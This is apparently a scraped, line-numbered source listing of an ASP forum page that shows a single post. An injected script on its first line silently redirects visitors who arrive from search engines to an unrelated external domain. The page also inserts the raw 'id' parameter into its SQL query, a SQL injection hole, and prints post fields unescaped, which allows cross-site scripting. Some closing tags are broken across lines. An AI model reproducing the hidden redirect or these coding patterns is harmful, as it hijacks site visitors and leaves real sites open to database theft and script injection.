d:\wwwroot\wuchunhua\bbs5\show.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="conn.asp"-->
002:
<%
id=request.querystring("id")
%
>
003:
<%
set show=conn.execute("select*from bbs where id="&id&"")
%
>
004:
<a href="index.asp">
005:
<b>回到首页</b></a><br><b><a href="say.asp">发表帖子</a></b><br><hr size="1">
006:
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" height="180">
007:
<tr>
008:
<td width="21%" height="22"><b>作者:</b>
<%
=show("name")
%
></td>
009:
<td width="79%" height="22"><b>主题:</b>
<%
=show("title")
%
></td>
010:
</tr>
011:
<tr>
012:
<td width="100%" colspan="2" height="158" valign="top"><b><br>内容:</b>
<%
=show("body")
%
></td>
013:
</tr>
014:
</table>
<%
set show=nothing
%
>
015:
016: